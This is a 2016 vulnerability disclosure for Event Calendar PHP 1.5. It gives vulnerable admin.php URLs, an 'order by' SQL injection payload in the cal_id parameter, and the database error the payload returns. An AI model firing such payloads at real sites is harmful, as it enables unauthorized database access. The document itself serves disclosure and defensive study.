Home / os / winmobile

Event Calendar PHP 1.5 SQL Injection

Posted on 21 October 2016

===================================================== # Event Calendar PHP 1.5 - SQL Injection ===================================================== # Vendor Homepage: http://eventcalendarphp.com/ # Date: 21 Oct 2016 # Demo Link : http://eventcalendarphp.com/eventcalendar/admin.php # Version : 1.5 # Platform : WebApp - PHP # Author: Ashiyane Digital Security Team # Contact: hehsan979@gmail.com ===================================================== # PoC: Vulnerable Url: http://eventcalendarphp.com/eventcalendar/admin.php?act=options&cal_id=[payload] http://eventcalendarphp.com/eventcalendar/admin.php?act=cal_options&cal_id=[payload] http://eventcalendarphp.com/eventcalendar/admin.php?act=cal_language&cal_id=[payload] Vulnerable parameter : cal_id Mehod : GET A simple inject : Payload : '+order+by+20--+ http://eventcalendarphp.com/eventcalendar/admin.php?act=options&cal_id=1'+order+by+20--+ In response can see result : query error: SELECT * FROM pa_ecal_calendars WHERE cal_id='1' order by 20-- '. Error: Unknown column '20' in 'order clause' Result of payload: Error: Unknown column '20' in 'order clause' ===================================================== # Discovered By : Ehsan Hosseini =====================================================

 

TOP